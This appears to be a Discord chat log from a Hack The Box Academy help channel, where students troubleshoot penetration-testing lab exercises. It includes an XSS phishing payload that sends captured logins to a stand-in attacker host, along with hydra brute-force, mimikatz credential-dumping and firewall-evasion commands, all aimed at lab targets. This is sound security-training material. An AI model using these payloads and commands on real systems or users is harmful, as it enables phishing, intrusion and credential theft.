#modules
I did mod it with 1337 and add /etc/hosts like the module said
and I still have this error
echo 10.10.10.174 server.fatty.htb >> C:\Windows\System32\drivers\etc\hosts
this is the command I used.
rebuild with a new jar file and I still have this same error
I even revert a box too.
Are you sure that's not meant to be replaced by the target ip or your ip?
let me try with my own ip
Idk what all it had you set up
Hey Marcie, have you started the CWEW by any chance?
I haven't done this module so idk what it's expecting ¯\_(ツ)_/¯
Also you typed it as 10.10.0.174
just like the module said, yes
Sometimes the examples aren't 1::1
well I'm gonna try with my ip
Sometimes you gotta determine when it's referring to your ip or the machine ip
And Sometimes you can tell by how it's phrased in the examples
Is it 10.10.10 or 10.10.0
Two conflicting things here
Then why does your screenshot show 10.10.0?
oh no
Literally why I asked a minute ago
ok nevermind it didn't work
You can pop a shell from inside SQL?
well yes and no
depending on the context
ok nevermind it didn't work lol
sometimes
if it's set up a certain way you can even upload things
I finished this one today. I took a break yesterday and definitely forgot all about the etc host thing today but it all still worked just fine
Hey I got this error every time I run evil-winrm through proxychains on my local VM; when I do the exact same thing on the pwnbox it works. I checked both proxychains configuration files and they are the same
Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization error
Has anyone run into this error before?
that's not a winrm through proxychain error, that's just a winrm error
I guess update winrm ?
doesn't work for me mate lol
wanna head to private DM ?
nah you'd need to update your ssl conf file
it's not really a winrm fully issue
it's how winrm uses openssl
worst case scenario, you need to reinstall your vm
as it's just cooked
Bedtime for me amigo but I'll deffo do what I can to help in the morning
Yeah I uninstalled evil-winrm multiple times, but nothing changed. I'm at v3.5 on my VM and pwnbox has v3.3
That module took my mojo today
again it's not really a full winrm issue even with purging and reinstalling stuff
google the error and see if you can find a fix
or chatgpt
I have been searching for 2 days
Some ppl talk about vpn issue
tried everything but nothing works
chatgpt won't help in this instance
So I thought maybe someone had already had that
maybe try this?#starting-point message adding these lines might fix it; if not then you're gonna have to reinstall your vm as a whole my dude
forgot you can't see the starting-point channel since your account isn't linked
I'll try, thank you
I GOT IT TO WORK!
I can't find
that's the one
you literally found it 
also delete as it's a spoiler
that's literally it, just because it doesn't end in .ccache doesn't mean it's not a ccache file
Well, I cannot extract this file or use it as a keytab, what can I do?
dude
it's a ccache file
you don't need to do anything with it as a keytab
just put it as the KRB5CCNAME variable
and it'll work
it's explained in the section to do that
for ccache files, and it's how you impersonated julio earlier iirc
For the SMTP section of footprinting module it's asking for a user...
I'm using smtp-user-enum and have given it two different users...neither is being accepted.
if you use the right Method and the right wait times: you'll only get one answer
I'll just try them all.
The hint references a wordlist, but I'm not seeing one in the course materials.
there's a referenced wordlist in the section reading
oh wait isn't there the footprinting wordlist from the resources button?
the hint
deleting it but yeah
I pulled it with the big wordlist, just took a while.
always check the resources button when you go into a module
cheat sheet isn't always gonna be helpful or give context of the commands
Right, well at least I had a big enough wordlist XD
90 gigs worth.
I had more ready
word of note: HTB will never have you running super large wordlists for bruteforcing
hi everybody! I was doing recursive fuzzing with ffuf in the attacking web applications with ffuf module, but I forgot to connect to the academy-regular vpn! I tried to ping the ip:port given by the exercise but I did not ping anything! I hope I didn't make a mess... but if I lost all the packets during ping I think I'm safe
section: Phishing
Phishing
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();
I am not able to remove the image URL as requested although I have entered the correct code
can anyone who finished the XSS module dm me please
OKAY IM SORRY but that hard lab was bs in common services
not enough info about remote reading on linked servers using mssql
i literally had to read a 32 page article on all of it and on how to execute commands on remote links. which it did not touch on
hello everyone, I'm new to this, so please excuse the stupid question, but am I supposed to be setting up the VPS inside the VM or on my computer?
hey @fathom pendant . is there a simpler way i can solve this
this command just lists out too many things
Nope don't forget to do 2>/dev/null
The example command they give also works well
Sec
alright
Your min size is wrong
It's asking for larger than 25k
-size +25k and -size -28k will narrow it further
Will there be any red team modules in the future?
alright finally got it
without looking at ur answer
Probably
I'm having trouble understanding IPMI. I have taken notes on the section but I really want to get to the next section and it's been a week of me reading and rereading the section and trying to understand it. Should I just do my best and start trying to break in and when I get the flags move on? I feel like maybe I need to come back to IPMI later but I am not gonna skip the section.
I am not gonna look up the answer but I'm just wondering if reading through it one time and just following along with the examples would be good for now.
I feel like this section can be completed by following along with the exact examples in the text.
I have read and reread many times and taken notes.
There's only one thing that's not necessary from that section
And that's the mask it gives
I am following along with the examples and it's not giving me a username or password so I kind of can see
Other than that all good and should be able to use the provided wordlist or rockyou to crack it
ok thanks
If you're unsure why the hash you get from msfconsole doesn't just give you the answer, it's because the hash isn't in the default wordlist for that tool in msfconsole
Interesting.
I'm trying different wordlists
you're sure it's in rockyou? what username file should I use?
I'm going through various wordlists
let me go take a look
ok
rockyou does the job
It asks me to log in to the machine via SSH, but when I enter the password, I get an access denied error.
question - Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.
for both user file and password file?
because it needs both a username and password file
unless I should just do IPMI usernames
and do rockyou for passwords
there is a suffix in hashcat that ignores the need for username
since you already have the username
What is your command?
hold on I think I got it
I set right username file and found rockyou.txt and set that to password file
we'll see if it cracks soon
it's still not cracking, let me show you my output
```
[msf](Jobs:0 Agents:0) auxiliary(scanner/ipmi/ipmi_dumphashes) >> run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[msf](Jobs:0 Agents:0) auxiliary(scanner/ipmi/ipmi_dumphashes) >> show options

Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):

   Name                  Current Setting                                                 Required  Description
   ----                  ---------------                                                 --------  -----------
   CRACK_COMMON          true                                                            yes       Automatically crack common passwords as they are obtained
   OUTPUT_HASHCAT_FILE                                                                   no        Save captured password hashes in hashcat format
   OUTPUT_JOHN_FILE                                                                      no        Save captured password hashes in john the ripper format
   PASS_FILE             /usr/share/wordlists/rockyou.txt                                yes       File containing common passwords for offline cracking, one per line
   RHOSTS                10.128.244.138                                                  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                 623                                                             yes       The target port
   SESSION_MAX_ATTEMPTS  5                                                               yes       Maximum number of session retries, required on certain BMCs (HP iLO 4, etc)
   SESSION_RETRY_DELAY   5                                                               yes       Delay between session retries in seconds
   THREADS               1                                                               yes       The number of concurrent threads (max one per host)
   USER_FILE             /usr/share/metasploit-framework/data/wordlists/ipmi_users.txt   yes       File containing usernames, one per line

View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) auxiliary(scanner/ipmi/ipmi_dumphashes) >>
```
it's doing something wrong
where is the hashcat command?
that's just msf where it dumped the hash
you still need to crack it
ok so I need to look up where it dumped the hash?
Your rhost is wrong
ok hold on
You put 10.128
oooh wait, you didn't even get the hash?
ok thanks
or whats the problem
Targets start with 10.129 on the vpn
It looks like they never got the hash
okay yea that makes sense, since after "run" he just gets "Auxiliary module execution completed"
I thought he was already cracking it

ok ya I thought metasploit cracked it for you
ok so I should look up where metasploit saves hashes?
it can if it's default. but this one ain't one of em
The footprinting module is just...ugh.
ok thanks
i quite liked the medium lab 
It's not that bad
¯\_(ツ)_/¯
By far it's one of the easier ones
sudo openssl s_client -connect 10.129.175.104:imaps
LOGIN BAD First parameter in line is IMAP's command tag, not the command name. Add that before the command, like: a login user pass
Why will it not let me login?
Managed to upload the shell via ftp and now accessing it via port 443 and https with authentication, but I just seem to download the file (a php file) instead of executing it.
thanks ok figured out username and password and got flags
Imap commands require a prefix
<anything> [command] [parameters]
As shown in the examples
1 login user pass
But you can literally prefix it with anything AFAIK
You can even use a 20 character string
This stuff is a trip.
wait till he gets to the point where he needs to figure out how to read the content of the email 
1 fetch id body[]

I will die on the hill that they need to change the all to body[]
have you managed to login now 
The more you say you dislike it the worse it will be for you
I like other things a lot.
Like Burp.
iirc you will see burp at shells n payloads the first time
so a few away
They said they've done the cbbh path already iirc
ah
Yes.
But tbh knowing how to do things at a baseline is important
Enumeration/Footprinting isn't fun to me.
Well it's important
ufff that's the main point
And improper enumeration will bite you in the ass
To an extent, yeah. But with web apps it seems more straightforward.
Well cpts isn't about web apps
So get ready to struggle bus your way out of your comfort zone
Also a lot of the stuff you'll see on the attacking common services section
I mean it's talked about and shown in the section
its in the module tho 
It... I mean yeah but...it's counter-intuitive.
Not really
It is to me.
Idk how it's counter-intuitive tbh
Well, look at Bash.
Ok?
I don't need a prefix to throw a command at that...or anything else I've interacted with.
You have to end commands with ;
Yes.
But it MUST be a semicolon.
Which makes sense, because that goes back to C-type languages.
But also: at the end of the day, it WAS told to you
You just either glossed over it or didn't read
Glossed over for sure.
When you get stuck next time: re-read the section
Often the answer lies in the material
I want ice cream.
Go for it dude

i see, that's gonna be fire
Well yeah, it denotes an array.
Or in this case...content I guess.
It should be "" but whatever XD
Well it's basically telling it to grab all data within
Wouldn't that be an * ?
No, it shouldn't
No because thats not how the body data is stored
Ah, body data is stored in an array?
You can Google it and learn
I will say, this is MUCH better than the OSCP.
The course for that made me want to put my face through a plate glass window.
Introduction This will be a detailed, though not exhaustive, quickstart into using IMAP. Initially this was also going to highlight the python library, imaplib, but the post became too long! Maybe next time.
The hope is that this'll contain enough information about querying email servers that additional questions would most likely be redirected ...
Thanks. Yes SNMP is more straightforward.
Although that may be because I have a networking background
trying to find a way to transfer back to my attack host. tried smbserver to transfer like in the Attacking SAM and Attacking LSASS sections. Trying to get the lsass.dmp off the windows machine
smbserver did not work
if you are rdping, connect a drive or make an smbshare
you can also use POP3 which is slightly different but doesn't have all the folders/subfolders just good ole UID grabbing
@heavy edge tried smbshare. will try connecting a drive but idk if I've learned that yet
Interesting.
xfreerdp has /drive:
if you are dumping the lsass you should have learned about connecting a drive in the rdp section of footprinting
it's not taught to you
then it seems like they recently added it
i'm referring specifically to xfreerdp's /drive: option
not creating a share
that looks like a hash to me
note the purpose of this isn't to transfer files, it's to steal the hash
which you can use for multiple purposes; either a PTH technique or cracking it
ahhhhh I didn't even see that ;c
must be a recent add then
it's explained that's what you're doing
anyways yeah, if ur in the password section that means you got through the file xfers section ideally, in which it was shown
@novel hinge
if they're in footprinting the method they're doing is literally explained in the SQL section

in password section currently
yes xd
gotta stop calling modules sections my dude
ah then a lot of the stuff is taught to you already before that point
so these are multiple hashes that belong to multiple users? even though I wasn't able to get the file, I'm guessing it read the contents of the lsass.dmp?
just follow the section along and you'll be fine
that hash specifically is the machine account
i know i know 
that's not the lsass dump
yeah thats not an lsass dump thats just an admin hash
did you look at how to dump the lsass?
the section they're doing is about dumping lsass
yeah either through task manager or the other method I forgot, I just do task manager
I know they aren't dumping it
which has nothing to do with grabbing hashes
command line stuff
I'm on the Pass the hash section
oh
they didn't give me the hash for david's account. how do I get his hash
I'm guessing through lsass right?
using the tools that were talked about
it can be, yes
dude read the question before it
Connect via RDP and use Mimikatz located in c:\tools to extract the hashes presented in the current session. What is the NTLM/RC4 hash of David's account?
I've tried mimikatz in c:\tools, I wasn't able to get it, that's why I started doing lsass
nope use mimikatz
look at how you use mimikatz and you'll be able to dump the hash
yes I went back in a previous section and did the dump and it didn't work, I'll try again and send my results back, give me 2min
because the hash may also just not be present in lsass (it could be)
you can also just look at the cheatsheet
i can't remember what section it tells you how to use mimikatz to extract info
the arrows weren't meant to be put in literal
........................
they were meant to be sequential steps
if people took me as literally as you do I'd be so goddamn rich rn
ngl I did fiercely blow air out of my nose seeing that
I have a question regarding this module : Introduction to Windows Command Line:
I finished the first question: "SSH to with user "user0" and password "Start!"
The flag will print in the banner upon successful login on the host via SSH."
Question 2: "SSH to with user "user1" and password "previous flag"
- 1 Access the host as user1 and read the contents of the file "flag.txt" located in the user's Desktop."
When I try to SSH and Access the host as user1 I get an error stating that the password is denied.
Do i do this while logged into User0?
no
"previous flag" is the previous answer
so user1 password would be the answer you got for user0, user2 password is user1 answer...
omg thank you~ I have been trying this for the past hour lol. Appreciate the help!
so I read through that post marcie, ended up just going back to the commands that execpanda gave. it doesn't show any credentials for a user named "david"
could be sekurlsa::loggedonusers
or a number of other things
sekurlsa::logonpasswords got it now. lets see if i can finish this section now
I'm on this question for the password attack module: Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer.
So i've downloaded the resources.zip and ran this to make the wordlist
hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
Then I did hydra -l sam -P mut_password.list 10.129.202.64 ssh -t 4 first and now i've done hydra -l sam -P mut_password.list ssh://10.129.202.64
It has been cracking for fuckin decades somebody please help
attack a different service
there's more than ssh open
aw man
also: you can increase threads with -T
thanks, I shouldn't have been rushing to play super mario bros wonder
step 0: enumerate
that one was a pain, I forgot the command you do first but you need to take in the first 20k, so head -n 20000 xx.list > 20k.list. get rid of all the numbers at the beginning
then start cracking.
get that knocked in your head
you don't need to
i think he's doing that one right, i just did that one
i will knock it in
it just makes it go a bit faster
the main issue is attacking ssh
which for hydra is VERY slow
you can enumerate more to get the password in that one?
damn, I just brute forced that one after taking the 20k
yes, there's multiple services running on it
i wanna say ftp, ssh, and smb? it's been a minute
i think you're right, i def remember ftp
nvm
anyone ?
Open wireshark and start listening on the main interface. I know it sounds crazy because there's no internet connection in the target box, but just run it and you'll see the traffic coming in. Then you'll be able to see HTTP packets and see the domain
Thank you very much !
u're a lifesaver! I've found the right direction of attack now.
@next bronze I can confirm your dump tool is pretty neat! It's a goto now
awesome, thanks! 
ill have to try it out
on this section https://academy.hackthebox.com/module/162/section/1572 (documentation module) I logged in to the whitehat as htb-student but it seems like there is no existing current report
it's in the module's resources iirc
i am stuck on flag4 on linux priv assessment
any hint , found tomcat but can't find any way to exploit
in the windows privesc module, does anyone know the difference between named pipes, as in, Syntax: \\.\pipe\<pipename> or \pipe\<pipename>? I can query LSASS with both but only SQL with the latter, which makes me think it's an API or env thing?
as in .\accesschk.exe /accepteula \\.\Pipe\lsass -v & .\accesschk.exe /accepteula \Pipe\lsass -v both work
but .\accesschk.exe /accepteula \\.\Pipe\SQLLocal\SQLEXPRESS01 -v will not work
but .\accesschk.exe /accepteula \Pipe\SQLLocal\SQLEXPRESS01 -v will work
Thanks but already been through this and can't seem to find the reason
The period represents the local computer
but when it's omitted what does it mean? That's what I am trying to figure out
Guys if I do up to tier 2 modules will I be able to do htb boxes?
Like the hard ones?
maybe
¯\_(ツ)_/¯
most boxes have some sort of gimmick/cve related to them
or their name hints at what the vuln may be
Guys I have a student gmail account right now. Eventually I'll get alumni gmail account.
Will I be able to use alumni gmail account to get student subscription
Ok
if it's a .edu email it should be fine
It's not a .edu email
one is global scope, the other is relative scope
it's how accesschk reads the input
then you're not likely gonna be able to access the student discount
@topaz sable
I don't have a .edu mail address and I've been able to get student discount
You'll need to contact support and send them a proof that you are student
PS: I have a .net mail address
Thanks
likely and generally aren't the always
the only people that know 100% would be support
Can I use the student mail and get discount even after I graduated college?
Will you be a student after you graduate?
RESPECT!
No?? But I will still have access to student mail id
Yes, if you have access to email id.
Module: Active Directory Enumeration and Attacks, Section: Credentialed Enumeration - from Windows, Question: I can't seem to execute Snaffler using .\Snaffler.exe -d INLANEFREIGHT.LOCAL -s -v data
what errors are you getting?
it's ok, I found it in C:\Tools, false alarm
remember: .\ is convention for "current directory"
yep thanks mate
On Detecting DCSync/DCShadow the question:
Modify the last Splunk search in this section by replacing the two hidden characters (XX) to align the results with those shown in the screenshot. Enter the correct characters as your answer.
I got the correct answer, but I am wondering why replacing the XX with the wildcard ".*" doesn't show the answer
```
| rex field=Message "(?P<gcspn>.*\/[a-zA-Z0-9\.\-\/]+)"
| table _time, ComputerName, Security_ID, Account_Name, user, gcspn
| search gcspn=*
```
because you're looking for something more specific
while wildcards can be useful they can also be so broad they miss the mark
but it returns just 6 events and if I replace with the answer it will show different events
shouldn't it return all the events?
Where is the Laudanum aspx web shell located on Pwnbox? Submit the full path. (Format: /path/to/laudanum/aspx)
find might help
Why is there no new content on the academy ?
I would like to know the intention of the problem in "Firewall and IDS/IPS Evasion - Hard Lab".
When I search for ports, I see multiple filtered ports.
But I don't understand if --source-port can only get flags 53 port.
Why isn't the other port working?
And I don't know why I had to target a 50000 port.
53/tcp filtered domain
54/tcp filtered xns-ch
55/tcp filtered isi-gl
50000/tcp filtered ibm-db2
who can help me DACL Attacks Skill Assessment fourth question
I found r***** user can Owns for mic****group and I get hash for user
you asking why --source port was important?
well it's common for IDS/IPS (firewalls and intrusion detection systems) to be configured to allow some kind of traffic.
and since port 53 is DNS which a lot of firewalls "allow" traffic from it since its a dns, the packets/traffic appears legitimate.
so with source port 53 we can evade filters.
like with source port we can fool the IDS/IPS that the request or well traffic comes from a "Trusted" service.
Thank you Schainy .
However, port 53 and port 50000 are both filtered.
And when I scan all port, only 22 and 80 ports that are open are shown.
HTB Question: Now our client wants to know if it is possible to find out the version of the running services. Identify the version of service our client was talking about and submit the flag as the answer.
let me boot up the challenge
and see
module: Active Directory Bloodhound
Hello,
has someone passed the last skills assessment question?
Find the percentage of users with a path to GLOBAL ADMINISTRATOR. Submit the number as your answer (to two decimal points, i.e., 11.78).
||I have a total of 15 AD users and 3 Azure users||, right ?
show me your command
my 5k is opened
d
can anyone hint the dacl attacks module
nope, check the number of AD users again
normal users, not special or default accounts
My command is this.
But it's all filtered.
```
$ sudo nmap -p53,50000 10.129.232.134
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-04 10:58 BST
Nmap scan report for 10.129.232.134
Host is up (0.14s latency).
PORT      STATE    SERVICE
53/tcp    filtered domain
50000/tcp filtered ibm-db2
```
bro did you solve the dacl attacks module
well yea firewall is filtering it, you need to add something to your command to evade it
Today I completed the web service and api attacks module at htb but I have some misconception about soap.
My question is that soap is a web service or protocol ???
Hello man
https://academy.hackthebox.com/module/134/section/1219 Can you help me plz this
To know the admin login, must I look at the token? But I made a list of the 200 UIDs and I don't find a different token ^^"
Maybe reset and try again, or do it via bash script potentially. I forget if one came with the module or I made the one I have in notes
Thank you, Schainy. In the nmap scan result, port 53 was filtered and the relationship between the source port was misunderstood. Thank you very much for your kind explanation.
But you should know the admin uid by now.
Any different result when you manually manipulate the request?
Cleared this yesterday, had the same issues. Check the hint
#modules message
seems like he solved it 
Hi All, I do have a question about the Skills Assessment of Shells & Payloads. I'm still chasing the second flag. I did investigate the blog and checked the post with the relative exploit. Shall I fix the exploit or should I try to re-use the one already present on the server?
what do you mean by fix the exploit?
The exploit does not require any fixing, import to metasploit and fire it up. =)
I loaded the exploit from exploit-db in msf but it raises an error for the split function
I just re did the assessment like an hour ago and it worked fine on my end. No tweaking required.
maybe I did something wrong but it's complaining indeed
set the vhost and it should work.
thanks for the help I'll try it out
if i may ask one more thing.. the foothold host is lagging very much. Is it normal?
iirc the foothold is indeed laggy. You can start the ssh server and go from there.
that's what I'm doing but I can't type more than 3 chars straight hehe. I'll just be patient
doing the same with RDP, laggy af but at host 3 right now 
skill issue just pivot or start sshd so you don't have to use rdp
finally
my ssh doesn't have a gui so I could look at the website
We haven't learned that yet
wait
so it's skill issue 
what module are you on
shells n payload
oh
well to be fair i did it in the past but forgot so would need to look it up lol
you don't
only one question directly asks about the location on the pwnbox
other than that; you can use your own machine
it was easier for me to use pwn on that one
Hi! sorry, can someone help me. I'm in the Footprinting Lab - Medium and after entering remmina and finding the user I can't enter as admin because the password contains "@" and this character doesn't work as normal on my mac.
if someone knows why or how to resolve it i will really appreciate it
wrap the password in single quotes
oh wait remmina
idk how you normally get the @ in mac ¯\_(ツ)_/¯
also idk what you mean by "this character doesn't work as normal"
are you copy/pasting the password you found? or manually typing?
if copy/pasting: are you sure you don't accidentally have any extra spaces?
I usually use alt+2 and it's not working, the @ never appears
try shift+2 if you're using a vm
Difficulty level is swapped 
i tried to copy but it doesn't give me the option at all.
Hello
"doesn't give option at all" not descriptive
are you saying that for whatever reason it won't let you copy?
LINUX PRIVILEGE ESCALATION --> Docker --> where to start? I cannot find anything useful to start a docker with or something else...
true. took me quite a while to get into the first Host since I didn't know that || the footprinting computer is very important too ||
after that was quite easy
host 2 only problem was making the script run, once you did that you good to go
host 3 well yea speedrun
like you can't right-click -> copy or ctrl(cmd)+shift+c?
docker is already installed on the target.
also: as I said - it sounds like the keyboard is standard US keyboard layout - so shift+2 would be the @ sign
yes, I tried to manually copy, and the controls to add the @ aren't working. I searched on the internet for other controls in case but they also don't work to add the @. Then I tried to copy the password but ctrl+c or using the mouse doesn't work or give me the option to copy
you need to add shift to that if you're copying from a command line
copying from linux terminal requires the shift key, as ctrl-c is already bound to quit running process
are you using pwnbox?
i know mac is like cmd + g for @ in german keyboard layout
and once you in a pwnbox controls swap to native linux so ctrl shift V
shift c
they're trying to copy
Still don't know where to start, the paths used in the module don't work.
they're pasting into a GUI
Yeah, had to finesse the payload a bit for 1, other than that it's your typical boot2root system.
yea the || vhost || was the problem there. 
Hello
Just finished a couple of CTFs. I noticed I had to look up a lot of stuff frequently (commands, services to use, what the next step would, etc.). Is this normal?
yes it's normal
especially if you're new to hacking
Gotcha, thanks!
Check if the user is in docker group, get the images from the docker service and you should be good to go.
Just gotta look back at the section from there..
if alt+2 doesn't work I'd try to switch keyboard layout to something like german, since there it's cmd + g or cmd + q I'm pretty sure, and try with that if that's a workaround?
I don't know much about Docker except for what they cover in the module... Sorry but I still don't know where to look. The cheatsheet does not mention anything about Docker. With LXD they provided an explanation
like that:
||```
MATCH (u:User)
RETURN COUNT(DISTINCT u) AS u
```||
?
that could work but it will return a few extras, ignore the standard account and machine accounts
or you can just search @domain
you will have to review the section again or do some external research on that mate.
there was a whole explanation on docker daemon and clients, no?
Good afternoon, I can't understand why the button is not interactable after I make my changes.
Module: Using Web Proxies
Section: Skills Assessment
Question: The /lucky.php page has a button that appears to be disabled. Try to enable the button, and then click it to get the flag.
What I have tried: I intercepted the response and removed disabled from the html code then forwarded the response but when I click the button there is no flag.
Yes there is, perfect understanding of how it works after reading that, but how do I access the daemon? Probably I've misinterpreted or translated something wrong and keep missing the point because of that.
the daemon runs in the background, and we interact with it via the docker client.
Did some RTFM, slightly understanding now how it works. Now i need to find out to start what Docker and how. Thanks for the help.
the socket then bridges that gap between the client & server.
Hm will try. More of a Docker module than escalation techniques
Found it with your help!
Thanks for the patience
you can check if docker is running on the target (docker --version); if not, that's when you upload a docker container, but in this case it is up and running, so you just enumerate, as shown in the section.
docker ps gives me running instances right?
@soft cedar I misunderstood some of the explanation (English isn't my first language). With your help I've figured out what they tried to teach me. Thanks
yes
Guys what should I learn to be able to start cracking htb machines?
Hi, inside the Brute Forcing module there is the task to bruteforce the ssh login for a certain user. When I try to fire up hydra against the target I get the error that the target does not support password authentication. Trying to connect via ssh user@ip reveals that it actually does not. I am using the pwnbox so I am guessing this is a bug?
Can I speak with you in private message? The bot doesn't accept my message
just @domain in search
It's the same result with this request: MATCH (u:User {domain: 'INLANEFREIGHT.HTB'}) WITH COUNT(DISTINCT u) AS total_nb_user RETURN total_nb_user
for me it's always ||15||
Can someone from HTB Team explain how I can get help for one of the questions in the academy? I am a silver subscriber for it and I have my discord linked but I cannot find the option anywhere.
just search @INLANEFREIGHT.HTB in the search bar
Ah, it was the good old not thinking it through kinda deal. I solved it but I would still like to know how I can use one of the perks that comes with my silver subscription.
Is the total number of users ||10||?
Is there a way to remove the pwnbox display in the modules? Every single time I switch to the module the display downsizes. A reload fixes the pwnbox, but when I've RDP'd into somewhere else the RDP session downsizes as well, which isn't fixed on reloads.
no
however with most rdp tools you can enable dynamic resolution
which allows you to resize the screen
Are the CTFs self paced or anything? Also, do you only get two free hours and then you have to pay? I'm just asking...
wrong channel to ask; but CTFs are self paced -- and 2hr is lifetime of your account -- so yes
you can always use your own vm and the vpn
You can press on fullscreen which will make it jump to its own tab
Pwnbox is in the browser always.
sir
they're talking about while being in an rdp session
and they load a new page in academy
the full screen resizes down
xfreerdp has /dynamic-resolution which allows resizing
Remmina is also a good choice if you prefer gui for whatever reason
"If xss.htb.net was an intranet application, would an attacker still be able to capture cookies via sniffing traffic if he/she got access to the company's VPN? Suppose that any user connected to the VPN can interact with xss.htb.net. Answer format: Yes or No"
Taking a poll.... who thinks it's possible to sniff HTTP traffic from other users by way of your local machine's client VPN interface?
Am I missing something or this is a poorly written question?
it's not poorly written
It's possible
I don't get your point? The question is quite clear and the scenario is 100% realistic.
I suggest rereading the section and maybe you glossed over something
this is very realistic
do you understand how vpns and network traffic work?
Why would TCP traffic end up reaching an incorrect VPN interface? It's not a broadcast, and this is session security, it's not talking about ARP poisoning, MITM, etc....
is htb academy poorly written
what do you mean incorrect VPN IF? It asks if YOU had access to the company's VPN
Where does the question state anything about an incorrect vpn interface?
Employees are connected to the company's infrastructure via client to site VPN.
Years of experience with AnyConnect and GlobalProtect. I have a very good understanding of what traffic I can see from my local machine when I connect to a VPN - it's traffic from my client to whatever server, not traffic from other clients
This is the scenario that is given to you.
No, the clients will share a certain vpn dedicated subnet.
you can still sniff that traffic from other clients to the server on the subnet
There are no broadcast domains or routing at play here. You are not grasping the question I feel like.
99% no
Incorrect.... you may be in the same IP pool, but that does not mean you are in the same L2/L3 segment as other clients
brother you're overthinking it
do you understand how VLANs and subnetting work
it's not asking the granular details of it
Mate, stop it, you are embarrassing yourself here.
I'm just pointing out that it's a poor question
I'm not even to that module (looks at Marcie) yet and I understand it
It is ok not to know everything - I don't either but stop arguing over basic IT knowledge.
i'm taking the question at face value
I work in it-sec and I know how VPNs work.
i meant my use of module
not section

because modules and sections are inherently different
It's not, the academy material is crafted by people who are a lot smarter than most of us here including myself.
sections are parts of modules
wrong reply!
I meant this.
I'm agreeing with you
@fathom pendant chill, I said - wrong reply
Ik
fight
fight
fight
fight
lmao
but the point is: The question was phrased in a broad manner
it wasn't phrased in a granular "if a or b" or "traffic getting routed to you somehow"
sniffing doesn't require seeing traffic come to you
especially since it's giving you an intranet site
It is a simple thing. If the question doesn't name other variables - they are not at play. Anyone who has done some sort of IT certification, knows this. Especially CCNA is known for this.
^ yup
Name checks out.
Y'all on here being petty...?
if you don't like the wording, apply to htb, take 4 years to advance to academy dev, find the backend academy site, find the SECTION then change it
petty? no
lmao
he is not wrong
nah just submit a suggested correction in #858470491676737536
then have the dozens of people that have completed it tell you why you're misunderstanding it ¯\_(ツ)_/¯
she is also not wrong
I was trying to get him to avoid that
¯\_(ツ)_/¯
she right?
Honestly, I am pretty high ranked in Tryhackme and I have been doing htb actively for the past 6 months and I am getting my ass kicked by the material on here but it's very high quality. I have yet to experience being wrongfully stuck at a box or module.
high rank on THM
(being high ranked on THM is a meme here)
Exactly, it doesn't mean shit.
Had to learn that the hard way.
I think if THM also didn't have any help like YT videos and writeups then its 1% would have some value
THM needs to have an entire network that doesn't allow writeups and resets the VPN every 30m
then 1% means something
true
Tbf I think it is a good way to start for total noobs and it did help me get more into red-teaming, even though I worked for 3+ years as a cybersecurity consultant, but it got clear pretty fast that I needed to switch to htb.
I am 1%, I can say that it doesn't mean anything
as of right now THM is for the ones who think 'del c:\windows\system32' is hacking imo

I enjoyed THM when I joined it, but it's very hand-holdy
To sum it up, yes.
80% of the networks hold your hand and tell you where to look
i have to say that 0 cube question is harder than other question
sometimes
You guys are killing me. I literally said what you are now making fun of - that this platform is on a whole 'nother level in comparison.
Ok, now I'll be petty....
"Same Origin Policy cannot prevent an attacker from changing the visibility of @goldenpeacock467's profile. Answer Format: Yes or No"
This isn't even a question, it's a statement. "Session Security" MODULE content is ok, but the questions or non-questions at the end of each SECTION, are lackluster at best.
so you answer yes or no, what's wrong with that?
Incorrect, the question is if the statement is correct - yes or no.
it's a T/F question w. Y/N
If you don't like the platform just don't use it but please stop complaining about things which are absolutely fine.
spread security not hate my guy
i enjoyed that module
which module?
the session security one
probably your nmap command? -sn disables port scanning so nmap uses icmp to scan the hosts and it doesn't work with socks
So I'm in the digital forensics module and on the skills assessment portion. Is the entire skills assessment done through Velociraptor? I don't see any tools we used in the rest of the module on the target machine
I collected the artifacts with velociraptor, the disk image and the windows.memory.VAD artifacts, but stuck from there
Can someone DM about the hard skill assessment for Abusing HTTP misconfigurations. Im on the last step but its not working
what you see is what you get
you're stuck with velociraptor
the only thing they covered in the module with velociraptor was how to collect certain artifacts.. Well thanks for the direction to head at least
everything you were taught about velociraptor is all you need to complete the assessment
tool-operation wise
so you just have to manually sift through the artifacts with notepad or something?
or am i missing something
you certainly can't parse stuff like the memory or the MFT with notepad
you'll just have to think of another way to get the information you need
Hey! Velociraptor is a great tool, I use it all the time when the customer is too broke for InsightIDR.
Hey is it me or is the module's lab real slow?
My pwnbox was really slow as well yeah, switched to my vm.
I restarted VPN already, but takes like 1 second when I type sth
I'm not using pwnbox, connecting to the instances directly...
Hm, no that's fine.
okay question
this makes it seem like you already have access to the windows host.
why would I need to port forward if I download the exe on the segmented host
mine are super slow as well
Read again, port forwarding is needed for the reverse shell to connect back not for the initial payload transfer.
ahhh so the payload xfer would happen first, you get in, then can portfwd to get access to the internal LAN
that is segmented
Bingo!
that makes sense.
Imagine connecting to some DMZ webserver for instance, you would pivot into the internal LAN like this bc it has 2 different NICs for instance.
okay, like a jump server and such.
Never mind that that would be a terrible firewall config but yeah.
No, a server which has a leg in each of different networks / VLANs, whatever.
you'd use the jump host etc. or whatever to get into the internal LAN. When I did Wreath I used sshuttle and chisel a lot lol
so it makes more sense how htb is explaining it
yeah, they are nice tools but ssh forwarding is really easy where applicable.
and showing the diagrams
Yes, have fun!
then you get tools like ligolo that just make it a LOT easier
i hear ligolo makes life great. i just need to learn it
ligolo is nice yeah, but in a real pentest you would want to avoid dropping unnecessary binaries to disk.
So anything that is not 100% needed will not be deployed.
That is the sad and unfun truth on real red-team engagements.
